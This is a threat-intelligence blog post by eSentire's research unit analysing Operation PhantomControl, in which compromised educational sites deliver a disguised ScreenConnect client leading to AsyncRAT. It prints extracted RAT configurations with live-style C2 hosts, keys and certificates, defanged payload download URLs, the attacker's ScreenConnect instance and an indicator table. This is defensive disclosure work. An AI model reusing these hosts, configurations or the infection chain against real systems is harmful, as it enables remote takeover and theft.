Blog

Operation PhantomControl

BY eSentire Threat Response Unit (TRU)

August 3, 2023 | 6 MINS READ

Attacks/Breaches

Threat Intelligence

Threat Response Unit

TRU Positive/Bulletin

Want to learn more on how to achieve Cyber Resilience?

TALK TO AN EXPERT

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

In July 2023, we received multiple alerts from BlueSteel, our machine-learning powered PowerShell classifier, on the execution of malicious PowerShell commands. Our Incident Handling Team identified ScreenConnect activity, which created numerous malicious files under the ProgramData folder.

Figure 1: Malicious files dropped under the ProgramData folder


The ScreenConnect client was downloaded from a compromised Teachflix website (the website hosts educational videos for the classroom).

Figure 2: Compromised Teachflix website delivering ScreenConnect


Upon visiting one of the pages, the user would get an error pop-up instructing them to download and launch the binary “teachflix.exe” to be able to browse through the website.

The error icon and ScreenConnect binary are located under /.well-known directory of the compromised webpage, as shown in Figure 3.

Figure 3: Snipped of the code responsible for serving ScreenConnect binary


The threat actor(s) executed the 02.bat script via the ScreenConnect session. The batch script is responsible for launching the malicious PowerShell command.

Unfortunately, we were not able to retrieve the 02.bat script. We cleaned up the command (Figure 5), and we can see that it retrieves the file “Coinfg.SVG” from the server after the string replacements.

Figure 4: Execution of the 01.bat file via ScreenConnect session


Figure 5: Malicious PowerShell command


The payload was hosted on a Plesk-controlled website and was uploaded to the server on July 12th. After performing an open source search, we were able to identify this as the WSO PHP webshell, which is available on GitHub. Our Threat Response Unit (TRU) discovered over 20 websites impacted, including the ones that were at some point infected with the webshell and delivering ScreenConnect. The binaries were also located at /.well-known directory.

Based on the naming conventions and infection patterns, we assess with high confidence that the same threat actor is behind Operation PhantomControl.

Figure 6: Coinfg.SVG payload


Figure 7: Example of another infected website


The SVG file is a PowerShell script that performs the following actions:

Figure 8: Cleaned up a snippet of Coinfg.SVG script


Figure 9: PE responsible for process hollowing


Each file created under ProgramData does:

TRU was able to extract the configuration of the AsyncRAT (you can find the configuration extractor here):

InstallFolder: %AppData%
InstallFile:
Delay: 3
Hwid: null
Ports: 7707
Hosts: 3llah23.run[.]place
Version: | Edit 3LOSH RAT
Install: false
Key: Rlc2WlZTZktzenBUZjlxY3FuSERObFU3YTlKT1NWM2o=
MTX: AsyncMutex_pp5533
Certificate: MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhYg1tekZ8F29gsEIDgf8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMwVwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXLhXoEwCzwzvUCrzPXd3uMsLfFMDHZJOQ9OXKUCHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3ingNFaTyYmGsmLIE2Jq5AR1AxAFEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICtJ8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNtCjnlaMc40DJHlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQHMA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6xZCPjr22VxZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWTnKuRvIEYU4RaB39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7kVfIYuRxlYefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWNFmlzF3THeHU6vNJ5UoAWHYFW8wfJCbzQ0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckULlEf4Y92uJVKvLGruQtmtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv36kLKhgIJlqC7XxPVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWSJykARBv9o2BjLPTADfwAtc1b4nWo0lCI8IjjYXumJOuwRkFJ19INtwbffQvT9U12t4smpcZVOK0opk4Yr9r1tZYm92ghXA
ServerSignature: Fa5Vn2RD7yT9pbzm5Y7IKIzEEYkDjYtqyenb3bJPDoamNXehAGwA66fUHRfTxg8a3F45tVAHZ2wgBQtCSYZCorfyUEitB5Odpj1MC0bkwZAnZeGuwajEDSX9HMpT7vyckbm4JG019GHx6J317sQ7ri8IEPMhFW0bkWjNiOUrvLi6JV8IfTeHEOh2MGeavPWBA1p9kn3jwxqol439zzSP7byh6OuExD6QB3lh5OOX3OsenaxOrkWSlXDWDX9MPVTKZoClHLkVJB1VdrnZx0a8bzk6CJsQTKYO9UxXIwPVymcspbu9TQvPHiE3URyu9tdlwUsx3AJjEOSPnuyU5cOEslf7BnaV5gXxBt7Dn1bUB6a2fe5AO5dI3DXJJ7GY1vrwdJzHeNMrEdnxj876Ci4hwvqDHJm4HAomi0oKjRHl5pCqKYqlSocEfC2h0hjwuwDWqCfrIMY1roTtA2e2nnsn0MRo1nNh4kiqKgbsZjb54MwpoJL12UBAOn9vgA6zXGeLMp4AED6ylpsCbKwEeMZ2dddeUDLaMNr85WvFjQvH0Xf3KxQgNhWoAdJDnz6DH7UtGCRFoaCytusizRMNiEC8za6tyBwUxAgfCXGt76tj3WGJf3CWXA0Lj2guPeSUtq3CJgiVMJ8jHZoBE6aIfp690Mss
Anti: false
offlineKL: true
clipper: null
btc: false
eth: July23

TRU also observed two other attempts to retrieve the payload via ScreenConnect session after executing the 01.bat script. One of the payloads was located at 212.11.196[.]183/~sytimes/C0nfig.jpg. However, at the time of this reporting, the host is down.

Another payload was retrieved via the “runing.exe” binary. We were not able to retrieve the binary as it was removed. However, through open-source analysis, we assess with medium confidence that the binary is an AutoHotKey loader that is used to retrieve the secondary payload (in our case, the payload is located at hxxp://moealalah.za[.]com/moealalah.jpg, which is no longer available). We were able to retrieve similar files from VirusTotal:

The configurations extracted from both payloads:

Sample: 1da8d6c16662e383b822b6bade1a22a8

InstallFolder: %AppData%
InstallFile:
Delay: 3
Hwid: null
Ports: 6606,7707,8808
Hosts: exos.mywire[.]org,esxo.ddnsfree[.]com
Version: | Edit 3LOSH RAT
Install: false
Key: RlJwM3pUdnZaREZmWGdxRWZ1dWxrdEZKWW5ZQnVWbm8=
MTX: AsyncMutex_x
Certificate: MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhYg1tekZ8F29gsEIDgf8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMwVwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXLhXoEwCzwzvUCrzPXd3uMsLfFMDHZJOQ9OXKUCHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3ingNFaTyYmGsmLIE2Jq5AR1AxAFEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICtJ8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNtCjnlaMc40DJHlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQHMA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6xZCPjr22VxZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWTnKuRvIEYU4RaB39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7kVfIYuRxlYefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWNFmlzF3THeHU6vNJ5UoAWHYFW8wfJCbzQ0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckULlEf4Y92uJVKvLGruQtmtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv36kLKhgIJlqC7XxPVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWSJykARBv9o2BjLPTADfwAtc1b4nWo0lCI8IjjYXumJOuwRkFJ19INtwbffQvT9U12t4smpcZVOK0opk4Yr9r1tZYm92ghXA
ServerSignature: UhbE2oQynqRnX48lpueYKPvSxE9W0Ci2coEjy0d1o7nRpwyX3EaaUXnqAEksohjTKvYNHDgTXQfdQKDzVo79cH2OAlnWXPkcOCZj8DN3yWadCj7JxPtidP4347NuKIgEEDNtF4mPqNpJmnermqPX5ejFGhjd0noV0GcFFgoOl7yqxAdN6cSzmLXdmDvcttBCW2L9DM44QjrBqjzi10mafh04wuMEiucnccRBGEzYkMexVNFpGZaRkSJ8EBQ768qANvWxkSpbFtjWTSCcwXSTAbKJmtWLsoqFXyTFenTwc4V9fdZWl397APDJypxscAJqyaVFjAY7cGaIX50KsWIccjKjannqfF6mfjVt5R1GHDjg8UFpqeOq852CGxB4boPrBapNc4F1NMZccSprNAkK6JqK2jXDYu22HONz0ys9neuMDtUqOb7zbiVMFmeeb8Qk1hPKtr5J08WNaVfVGMJ28QE0CeQHJS84jBOsx2pNYlwhNPEJtrC8ac5zy5uveFYeOxm1Ilt5WZV3aVjYrrh2Fy21BF61eRl0D8Q3ABURjYW8JibDlsp7Ya1eHRX9EEb2YKkgSE3qJSNytul8sYlsi40KMdoktyg75wex6ZIIEqEOnQbdddsa2Nsf9mkt3aa4RxA8uIq7UHy2UeuzEHMwkWp6k
Anti: false
offlineKL: true
clipper: null
btc: false
eth: Default

Sample: 8f9b33e897e2b0fdd0ff93ee7d98750b

InstallFolder: %AppData%
InstallFile:
Delay: 3
Hwid: null
Ports: 8808,5010
Hosts: r0nj.ooguy[.]com
Version: | Edit 3LOSH RAT
Install: false
Key: Y3hNMmN0YU9odDlldE9kenhtQ3d1RkwxZXpMNkZMWEY=
MTX: AsyncMutex_6SI8OkPnk
Certificate: MIIE8jCCAtqgAwIBAgIQAPeWQ4YJ3MvReCGwLzn7rTANBgkqhkiG9w0BAQ0FADAaMRgwFgYDVQQDDA9Bc3luY1JBVCBTZXJ2ZXIwIBcNMjIwNDI1MDA0MTA5WhgPOTk5OTEyMzEyMzU5NTlaMBoxGDAWBgNVBAMMD0FzeW5jUkFUIFNlcnZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKT9nYYTjYTZhYg1tekZ8F29gsEIDgf8odvCbCmYKGGZZi2yND9NjtBXEMANM9PAXCyMapGvapDPbWgjYkLiMwVwa3kZRg7kLpXMpzInLQufe7Q587viilcsGDoVXmnf51SwsKPjSysZUpyayezUlJ1j6aXkZGnasiqJ7iKANdSneQducOn6IwaEuJBmpXKWxhhq8R9JMfiWeOXLhXoEwCzwzvUCrzPXd3uMsLfFMDHZJOQ9OXKUCHZNCgSPs4VSgCgM4eK0YTbu1mLsWSo5th3ingNFaTyYmGsmLIE2Jq5AR1AxAFEdC8zKL1bAwYQcRgIJs7QdedtAIufepPZ9D5HiOiy3ITYVonqwTiiIm20en7UICtJ8iDb4M2Q2iLWA7Yi9PN2cr0Xrs8A4RL29Qe5Ly2k35i74RiBTiT7Jbl2r7PcYlUGcjTCbdB9PWt3dYaTysuamoq2Zuo2HVRhhoZpwnajS9vNcjuZCYVoQvUQBUnHTeRZrtHXU5JV59ZBlu7flZneMZnbrWXTxob6Bdt8hrGoSDMWBFcO4jRzhT3hEFUpu4lSFeb9T3Vx4KWkHJhHtMvHuYgDTXERdEcI00sOUbVxgd62LhGXNNommQKCyiAGj0V5uLD73Fyw8vJpm3jXf3NgNtCjnlaMc40DJHlXE5AgMBAAGjMjAwMB0GA1UdDgQWBBQsT2WvtxGUK29SWs4sHz1xYye0fzAPBgNVHRMBAf8EBTADAQHMA0GCSqGSIb3DQEBDQUAA4ICAQCK5sVfnYyT5MqnCg3uHV2ojf12fIVFCY02Cc7gy3DVoE6xZCPjr22VxZunZ7DG1nt0kOJKDwdQYnGoMc5UPh8jbNRoc1ojLOCaluaIYQyl8AGkmUSRA3Ltk0XetDescffrWTnKuRvIEYU4RaB39f8ouGMCa7VXaxnGJ0z0BkUie8KsDLgNmJ7kVfIYuRxlYefoCsUTCogqf0fu3DuRHBpUVaSQQOf9YCbvFWH7Nupc3UIwpH5D8kSdpKusEfbRp8nfWNFmlzF3THeHU6vNJ5UoAWHYFW8wfJCbzQ0L8QZeOv4uy74oQP2Ed0RdrWCwUL6SSsDPZdDEOy4K4vVYkDTl1nL5tleATguELAEbbT42oLce85z4C7sKvpEfa4DPbU55xBLwvHniILFfjB7VVsrgVckULlEf4Y92uJVKvLGruQtmtKSqIuJjD8T9y7RIsk6g9624egV5UtLtv36kLKhgIJlqC7XxPVwMc2yw8BiQlvxQZgqSd1k7QmV1AhV3z2wqnYmb09ibTMYaMFjtamFegeFqc4jRLABhVQFEFv8z5E6G9vgKn5mQDWSJykARBv9o2BjLPTADfwAtc1b4nWo0lCI8IjjYXumJOuwRkFJ19INtwbffQvT9U12t4smpcZVOK0opk4Yr9r1tZYm92ghXA
ServerSignature: iWL0PXmyFu2bGJKrjiG4nztTVlih2vW2GMzh4NDA09LO69YZH7FaF9KzNc0pFtXLEOlDVDuDmRsOsmlA9BBQ5S9mwaiG8srRGTMhn7kl2pguLAAyvxxMxHLheYqdk4z8xHctIismHwlr3pUNDyeC4cDHALXwiUFcaLUfnB5OmsHt9TrPDsfD2TYTYGMFExpHMIKX1eDOCsE7fE1rIsYLsNy1HTQa6aJrNWBul83CESBkUaBwhzpDx7ho0PGOZCNl1kVrG5PA79erfofsJjpc6Dmyl72lKAwkS5BBuiZkIgNXXBs6tb3KXSLHqGrtNM04LRuQfSQuNjzU7Xlgxkk5HBtpgL2oq5Yo7NuE8z0ENdJXPjNZl2fDDU5yhLPPU0eEisjfwBcluMWuJMXRdvn3YPh3BUMBxaVymToUBsq8ggm3MBcLKwWW8rTLm0tHj2gMRFdwLLr0qsMHfmYTAYK8V3BHefaZNIVszvWLJoiWZSWQMxCJpJNkm69fxE2x8trSGECgLh8WZHAhLGjx3wp0YXBpJMXRCOHRSFtQOF6O1rHshPfQlb7g202F2H8IShiO4Grm030XcLYSDoCYCfqyWa6MqTvmy84k690QwbfQCoXwBHV8KPLWiFlBRhrKjs4tsDwm0KOcCd7z2cwp9D8Ecs
Anti: false
offlineKL: false
clipper: null
btc: false
eth: GRACE


The threat actor generated the ScreenConnect client using ClickOnceRun option which then, upon user execution, downloads the client from the attacker’s controlled ScreenConnect panel. In the case we observed, the attacker’s ScreenConnect instance was engineer53.screenconnect[.]com. Upon launching the client, the attacker gained full remote control on the victim’s machine.

Figure 10: Downloading ScreenConnect client from attacker's controlled panel

What did we do?

What can you learn from this TRU Positive?

Recommendations from our Threat Response Unit (TRU):

Indicators of Compromise

Name

Indicator

AsyncRAT

37950f1c490168d8c52bde11799fa40b

AsyncRAT

addfb71ffe786565f2e156fb5bb45f42

AsyncRAT

bf96552cf18eb495d06ec007cef18831

AsyncRAT C2

exos.mywire[.]org

AsyncRAT C2

esxo.ddnsfree[.]com

AsyncRAT C2

3llah23.run[.]place

AsyncRAT C2

r0nj.ooguy[.]com

Coinfg.SVG

fa176901cd6018b7a9516f3287fc5b75

HAZLOPTVICXEAQ.vbs

d8b8486e376519aa4bfe152b7137df33

1.bat

c6c8b7cd095bf71cb47604b0b3d7e4b6

HAZLOPTVICXEAQ.ps1

aa8a3ab5b73600904dd73664d338e27b

cgihvzm.ps1

5093aa07dcead8ec112fe9ff80fc6499

teachflix.exe

0716fa674efaed96bfe3cd96f991ccb3

Attacker’s ConnectWise instance

engineer53.screenconnect[.]com

Potential C2 for webshell

45.94.211[.]123

References

eSentire Unit
eSentire Threat Response Unit (TRU)

The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.

Read the Latest from eSentire